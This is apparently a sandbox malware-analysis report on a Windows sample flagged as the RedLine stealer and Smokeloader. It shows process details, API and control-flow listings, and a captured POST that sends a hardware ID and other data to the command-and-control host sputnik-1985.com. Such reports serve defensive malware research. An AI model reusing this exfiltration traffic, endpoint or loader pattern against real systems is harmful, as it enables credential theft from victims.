5           192.168.2.10  49743        104.21.80.1     443               7464  C:\Users\user\Desktop\xNuh0DUJaG.exe

Timestamp  Bytes transferred  Direction  Data
2025-01-11 06:48:40 UTC  275  OUT  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=I3XGM3M5HS6
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20389
  Host: sputnik-1985.com
2025-01-11 06:48:40 UTC  15331  OUT  Data Raw: 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44
  Data Ascii: --I3XGM3M5HS6Content-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--I3XGM3M5HS6Content-Disposition: form-data; name="pid"3--I3XGM3M5HS6Content-Disposition: form-data; name="lid"4h5VfH----I3XGM3M5HS6Content-D
2025-01-11 06:48:40 UTC  5058  OUT  Data Raw: 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b b1 64 f0 7c 3c 78
  Data Ascii: lpQ0/74G6(~`~O\_+d|<x
2025-01-11 06:48:40 UTC  1121  IN  HTTP/1.1 200 OK
  Date: Sat, 11 Jan 2025 06:48:40 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=k0jhko2a2chmltcrrvg3qqohfg; expires=Wed, 07 May 2025 00:35:19 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ptw6ZRmwXjxBKMuH1przlV69pxtT1LLa7MpZxwk66HAPXGgiXAh92U%2FcEp7TWPcBOb2D240NErIGiVbKSQov50mZNlF2iwoNlcjuYauaIeOGqPVoadNMhVz0fXwjGFSugMXr"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9002f6632a637d0e-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1925&rtt_var=732&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21344&delivery_rate=1485249&cwnd=244&unsent_bytes=0&cid=49517e7dbf08a107&ts=497&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0



Target ID: 3
Start time: 01:48:30
Start date: 11/01/2025
Path: C:\Users\user\Desktop\xNuh0DUJaG.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\xNuh0DUJaG.exe"
Imagebase: 0x400000
File size: 332'800 bytes
MD5 hash: 9B3E0C8C483F0708B9DC9C18CE46D0BC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 10
Start time: 01:48:40
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804
Imagebase: 0x470000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 3.2%
Dynamic/Decrypted Code Coverage: 19.6%
Signature Coverage: 55.2%
Total number of Nodes: 163
Total number of Limit Nodes: 13

Control-flow Graph

APIs
• CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
• SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
• VariantInit.OLEAUT32(?), ref: 0043BF3E
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
• String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
• API String ID: 1810270423-2807872674
• Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
• Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
• Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
• Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                                                                                                                                                                                        • API String ID: 0-3642574725
                                                                                                                                                                                                                                        • Opcode ID: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                                                                                                                                                        • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 590 4088ca-4088cc 588->590 591 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->591 590->591 592 408974-408997 591->592 593 408999-4089a8 591->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 607 408a99 call 40ba80 603->607 604->587 606 408aa7-408aad call 408170 604->606 606->587 607->604
APIs
• GetCurrentProcessId.KERNEL32 ref: 004088A4
• GetCurrentThreadId.KERNEL32 ref: 004088AE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
• GetForegroundWindow.USER32 ref: 0040896A
• ExitProcess.KERNEL32 ref: 00408AB7
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID: 6W01
• API String ID: 4063528623-326071965
• Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
• Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
• Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
• Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 611 40b2b0-40b338 612 40b340-40b349 611->612 612->612 613 40b34b-40b35e 612->613 615 40b700-40b74a 613->615 616 40b661-40b6ab call 408040 613->616 617 40b6b4-40b6ff 613->617 618 40b365-40b367 613->618 619 40b658-40b65c 613->619 620 40b36c-40b5a5 613->620 631 40b750-40b757 615->631 616->617 617->615 623 40ba61-40ba67 618->623 621 40ba52-40ba5e 619->621 624 40b5b0-40b635 620->624 621->623 629 40ba70 623->629 624->624 625 40b63b-40b646 624->625 630 40b64a-40b651 625->630 630->615 630->616 630->617 630->619 630->631 632 40ba00 630->632 633 40b804-40b80b 630->633 634 40b904-40b908 630->634 635 40b7c5 630->635 636 40ba06-40ba0a 630->636 638 40b7cb-40b7d1 630->638 639 40b80d-40b81f 630->639 640 40b90d-40b92d 630->640 641 40b94d-40b954 630->641 642 40b990-40b994 630->642 643 40ba11-40ba16 630->643 644 40b9d8-40b9f4 630->644 645 40b95b-40b970 call 441c40 630->645 646 40b8dc-40b8e6 630->646 647 40ba1d 630->647 648 40b75e-40b76c 630->648 649 40b7e0-40b7e6 630->649 651 40ba23-40ba30 630->651 652 40b9a3-40b9b5 630->652 653 40b8ed-40b902 call 441c40 630->653 654 40b7ef-40b7fd 630->654 655 40b972-40b976 630->655 658 40b934-40b946 630->658 659 40ba35-40ba38 630->659 661 40b97b-40b984 630->661 662 40b9bc-40b9d1 call 440260 630->662 663 40b9fd-40b9ff 630->663 631->629 631->632 631->633 631->634 631->635 631->636 637 40ba49 631->637 631->638 631->639 631->640 631->641 631->642 631->643 631->644 631->645 631->646 631->647 631->648 631->649 650 40b7a0-40b7bd call 441c40 631->650 631->651 631->652 631->653 631->654 631->655 656 40ba72-40ba79 631->656 657 40b773 631->657 631->658 631->659 660 40b779-40b794 call 441c40 631->660 631->661 631->662 631->663 664 40b83c-40b867 633->664 667 40ba3f-40ba42 634->667 635->638 636->629 636->634 636->637 
636->643 636->645 636->647 636->650 636->653 636->655 636->656 636->657 636->659 636->660 637->621 638->649 665 40b820-40b834 639->665 640->629 640->632 640->634 640->636 640->637 640->641 640->642 640->643 640->644 640->645 640->647 640->650 640->651 640->652 640->653 640->655 640->656 640->657 640->658 640->659 640->660 640->661 640->662 640->663 641->629 641->634 641->637 641->645 641->650 641->653 641->655 641->656 641->657 641->660 672 40b99d 642->672 643->629 643->634 643->637 643->645 643->647 643->650 643->653 643->655 643->656 643->657 643->659 643->660 644->663 645->655 646->629 646->634 646->637 646->650 646->653 646->656 646->657 646->660 648->629 648->637 648->650 648->656 648->657 648->660 649->654 650->635 651->642 652->629 652->632 652->634 652->636 652->637 652->643 652->644 652->645 652->647 652->650 652->653 652->655 652->656 652->657 652->659 652->660 652->662 652->663 653->634 654->629 654->632 654->633 654->634 654->636 654->637 654->639 654->640 654->641 654->642 654->643 654->644 654->645 654->646 654->647 654->650 654->651 654->652 654->653 654->655 654->656 654->657 654->658 654->659 654->660 654->661 654->662 654->663 655->659 658->629 658->632 658->634 658->636 658->637 658->641 658->642 658->643 658->644 658->645 658->647 658->650 658->651 658->652 658->653 658->655 658->656 658->657 658->659 658->660 658->661 658->662 658->663 659->667 660->650 661->642 662->629 662->632 662->634 662->636 662->637 662->643 662->644 662->645 662->647 662->650 662->653 662->655 662->656 662->657 662->659 662->660 662->663 663->632 674 40b870-40b8b6 664->674 665->665 673 40b836-40b839 665->673 667->637 672->652 673->664 674->674 684 40b8b8-40b8d5 674->684 684->629 684->632 684->634 684->636 684->637 684->640 684->641 684->642 684->643 684->644 684->645 684->646 684->647 684->650 684->651 684->652 684->653 684->655 684->656 684->657 684->658 684->659 684->660 684->661 684->662 684->663
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
• API String ID: 0-74227037
• Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
• Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
• Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
• Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 694 421e70-421e82 695 421e88-421edb 694->695 696 42214f-422151 694->696 698 421ee0-421f2d 695->698 697 422370-42237c 696->697 698->698 699 421f2f-421f62 call 43fb40 698->699 702 421f70-421fb4 699->702 702->702 703 421fb6-421fff 702->703 704 422000-42202c 703->704 704->704 705 42202e-422078 704->705 706 422080-4220a6 705->706 706->706 707 4220a8-4220e9 call 441c40 706->707 710 4220ec-4220ee 707->710 710->696 711 4220f0-422104 710->711 713 422156-422158 711->713 714 422106-42210b 711->714 715 422367-42236c 713->715 716 422110-422119 714->716 715->697 716->716 717 42211b-42212a 716->717 718 422130-422139 717->718 718->718 719 42213b-422146 718->719 720 422148-42214d 719->720 721 42215d 719->721 722 42215f-422170 call 408160 720->722 721->722 725 422192-4221a6 722->725 726 422172-422177 722->726 728 4221b0-4221ce 725->728 727 422180-422190 726->727 727->725 727->727 728->728 729 4221d0-4221e9 728->729 730 422204 729->730 731 4221eb-4221ee 729->731 732 422206-42221b 730->732 733 4221f0-422200 731->733 736 42227f-422281 732->736 737 42221d-42222c 732->737 733->733 734 422202 733->734 734->732 738 422354-422364 call 408170 736->738 737->736 741 42222e-42224d 737->741 738->715 741->736 745 42224f-42225f 741->745 746 422260-422269 745->746 746->746 747 42226b-422276 746->747 748 422286 747->748 749 422278-42227d 747->749 750 422288-422299 call 408160 748->750 749->750 753 4222b1-4222c2 750->753 754 42229b-42229e 750->754 756 4222d0-4222ee 753->756 755 4222a0-4222af 754->755 755->753 755->755 756->756 757 4222f0-422309 756->757 758 422322-422351 call 4215c0 call 408170 757->758 759 42230b-42230f 757->759 758->738 760 422310-422320 759->760 760->758 760->760
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: (ijkdefgau`c$au`c$defgau`c
• API String ID: 0-3415814675
• Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
• Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
• Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
• Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56

Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 766 4807a6-4807bf 767 4807c1-4807c3 766->767 768 4807ca-4807d6 CreateToolhelp32Snapshot 767->768 769 4807c5 767->769 770 4807d8-4807de 768->770 771 4807e6-4807f3 Module32First 768->771 769->768 770->771 776 4807e0-4807e4 770->776 772 4807fc-480804 771->772 773 4807f5-4807f6 call 480465 771->773 777 4807fb 773->777 776->767 776->771 777->772
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004807CE
• Module32First.KERNEL32(00000000,00000224), ref: 004807EE
Memory Dump Source
• Source File: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_480000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 9cce8c294103611244094b52ead4ac2b276583330fce761038f187e27ce8a4a1
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 1CF0F6315103106FE7603BF5988CB6FB6E8AF49B25F10092AE643911C0DB78FC094F64

Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 829 40aa32-40aa35 830 40aa82 829->830 831 40aa37-40aa5f 829->831 832 40aa60-40aa72 831->832 832->832 833 40aa74-40aa7b 832->833 836 40aa00-40aa12 833->836 836->836 837 40aa14-40aa2e 836->837
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                         • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MO$MO
                                                                                                                                                                                                                                        • API String ID: 0-3148518880
                                                                                                                                                                                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                         • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • 43A2C7AD89C30672D0632DF0E28DC412, xrefs: 0040D16B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                         • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 43A2C7AD89C30672D0632DF0E28DC412
                                                                                                                                                                                                                                        • API String ID: 0-3398323051
                                                                                                                                                                                                                                        • Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                         • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                        • Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                         control_flow_graph 492 210003c-2100047 493 2100049 492->493 494 210004c-2100263 call 2100a3f call 2100e0f call 2100d90 VirtualAlloc 492->494 493->494 509 2100265-2100289 call 2100a69 494->509 510 210028b-2100292 494->510 515 21002ce-21003c2 VirtualProtect call 2100cce call 2100ce7 509->515 512 21002a1-21002b0 510->512 514 21002b2-21002cc 512->514 512->515 514->512 521 21003d1-21003e0 515->521 522 21003e2-2100437 call 2100ce7 521->522 523 2100439-21004b8 VirtualFree 521->523 522->521 525 21005f4-21005fe 523->525 526 21004be-21004cd 523->526 529 2100604-210060d 525->529 530 210077f-2100789 525->530 528 21004d3-21004dd 526->528 528->525 534 21004e3-2100505 LoadLibraryA 528->534 529->530 535 2100613-2100637 529->535 532 21007a6-21007b0 530->532 533 210078b-21007a3 530->533 537 21007b6-21007cb 532->537 538 210086e-21008be LoadLibraryA 532->538 533->532 539 2100517-2100520 534->539 540 2100507-2100515 534->540 536 210063e-2100648 535->536 536->530 542 210064e-210065a 536->542 543 21007d2-21007d5 537->543 548 21008c7-21008f9 538->548 541 2100526-2100547 539->541 540->541 546 210054d-2100550 541->546 542->530 547 2100660-210066a 542->547 544 2100824-2100833 543->544 545 21007d7-21007e0 543->545 554 2100839-210083c 544->554 549 21007e2 545->549 550 21007e4-2100822 545->550 551 21005e0-21005ef 546->551 552 2100556-210056b 546->552 553 210067a-2100689 547->553 555 2100902-210091d 548->555 556 21008fb-2100901 548->556 557 210056d 552->557 558 210056f-210057a 552->558 559 2100750-210077a 553->559 560 210068f-21006b2 553->560 554->538 561 210083e-2100847 554->561 556->555 557->551 562 210059b-21005bb 558->562 563 210057c-2100599 558->563 559->536 564 21006b4-21006ed 560->564 565 21006ef-21006fc 560->565 566 2100849 561->566 567 210084b-210086c 561->567 575 21005bd-21005db 562->575 563->575 564->565 569 210074b 565->569 570 21006fe-2100748 565->570 566->538 567->554 569->553 570->569 575->546
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14
